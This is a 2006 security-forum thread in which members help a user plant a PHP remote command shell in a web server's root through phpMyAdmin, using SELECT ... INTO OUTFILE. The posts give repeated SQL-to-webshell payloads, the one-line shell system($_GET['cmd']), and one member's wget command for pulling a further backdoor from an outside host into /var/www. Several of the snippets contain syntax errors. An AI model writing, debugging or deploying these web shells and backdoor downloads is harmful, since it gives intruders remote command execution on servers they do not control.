Government Security
Network Security Resources

Jump to content

Photo

Php Remote Shell


  • Please log in to reply
19 replies to this topic

#1 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 02:43 AM

Well if i want to try out my PMA about security whit this code:
use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

I have a CMD on help.php right?
BUT when i try to execute commands like ( dir c:\ or net stop "service") it returns IN the CMD box: ( dir c:\\ , net stop \ )

Please help me somebody i'm totally lost :s

#2 kuza55

kuza55

    Corporal

  • Members
  • 161 posts

Posted 01 March 2006 - 03:30 AM

Well if i want to try out my PMA about security whit this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

I have a CMD on help.php right?
BUT when i try to execute commands like ( dir c:\ or net stop "service") it returns IN the CMD box: ( dir c:\\ , net stop \ )

Please help me somebody i'm totally lost :s

I'm not sure if this is the only thing wrong, but function names are case-sensitive, so Shell_Exec should be shell_exec.

And wouldn't it be easier to just dump a one line shell of
<?php system($_GET['cmd']); ?>
instead of something with a GUI......but yeah, if you replace Shell_Exec with shell_exec, it looks like it should work.....

#3 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 03:47 AM

ok changed those things now:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET['cmd']); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

BUT looks like it's wrong :\
('<?php system($_GET['cmd']); ?>

when i run:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].e' at line 1


but when i change to the right syntax:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET["-cmd"]); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

<?php system($_GET["-cmd"]); ?>

then it runs but when i go see @ help.php
there is a warning:

Warning: system() [function.system]: Cannot execute a blank command in C:\public_html\phpmyadmin\help.php on line 1


#4 SilentSky

SilentSky

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 05:21 AM

run it this way:
do it in mysql base
CREATE DATABASE tempdb;
use tempdb;
CREATE TABLE temptab (codetab text);

and then:

INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:\Website\MDEP\wwwroot\help.php' from temptab;
FLUSH LOGS

itīs very important that after the ; begins a new line.
if not, the code donīt work

#5 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 06:10 AM

run it this way:
do it in mysql base

CREATE DATABASE tempdb;
use tempdb;
CREATE TABLE temptab (codetab text);

and then:

INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:\Website\MDEP\wwwroot\help.php' from temptab;
FLUSH LOGS

itīs very important that after the ; begins a new line.
if not, the code donīt work




now i got another error :s
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in E:\XAMPP\xampp\phpMyAdmin\hepl.php on line 1


#6 SilentSky

SilentSky

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 07:13 AM

this directory exists as root directory in the php information?
E:\XAMPP\xampp\phpMyAdmin\

#7 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 07:37 AM

this directory exists as root directory in the php information?
E:\XAMPP\xampp\phpMyAdmin\





yes

#8 w00zy

w00zy

    Sergeant

  • Members
  • 246 posts

Posted 01 March 2006 - 08:17 AM

I think kuza55's solution is the best:

1. create a php-file with the following code: <?php system($_GET['cmd']); ?>

2. save it as, lets say, shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]

I can't uninstall it, there seems to be some kind of "Uninstall Shield".

#9 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 08:19 AM

I think kuza55's solution is the best:

1. create a php-file with the following code: <?php system($_GET['cmd']); ?>

2. save it as, lets say, shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]




so:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET['cmd']); ?>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/shell.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

right?

#10 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 10:39 AM

hmmz i heard something about there is a new code with a uplaod button? :s

#11 Partizaan

Partizaan

    Staff Sergeant

  • Members
  • 367 posts

Posted 01 March 2006 - 11:30 AM

There are a lot of other php shells on the inet that work fine
with all the noob buttons u need

#12 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 01:31 PM

There are a lot of other php shells on the inet that work fine
with all the noob buttons u need



yeah probarly :P but you can' find them :s

#13 PleXo

PleXo

    Private First Class

  • Members
  • 26 posts

Posted 02 March 2006 - 04:43 PM

hmmz i heard something about there is a new code with a uplaod button? :s



i have that, and the answer is no

its not new code, you can code it, you just need to know how :)

#14 roger_girardin

roger_girardin

    Specialist

  • Members
  • 127 posts

Posted 02 March 2006 - 09:25 PM

the sql injection vulnerability allow you to simulate a drop command to a file and to inject your code in that file instead of the dropped data

so you don't need to inject all that code into your php file

<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>

change it with

<? system($_REQUEST["cmd"];?>
or
<? system($_REQUEST["com"];?>


then your php file will execute the command you will put on the query string

eg :
if the injected code is <? system($_REQUEST["cmd"];?>
my_php_file?cmd=ls
or
if the injected code is <? system($_REQUEST["com"];?>
my_php_file?com=ls

then you will be able to upload a more sophisticated backdoor by something like :
my_php_file?com=wget:http://my_backdoor;cp /tmp/mybackdoor /var/www/mybackdoor;

rog

#15 joske

joske

    Private First Class

  • Members
  • 25 posts

Posted 03 March 2006 - 04:44 AM

Ok using this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:/Inetpub/wwwroot/phpmyadmin/help2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;





i get this prob:

Notice: Undefined index: -cmd in D:\Inetpub\wwwroot\phpmyadmin\help2.php on line 1





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users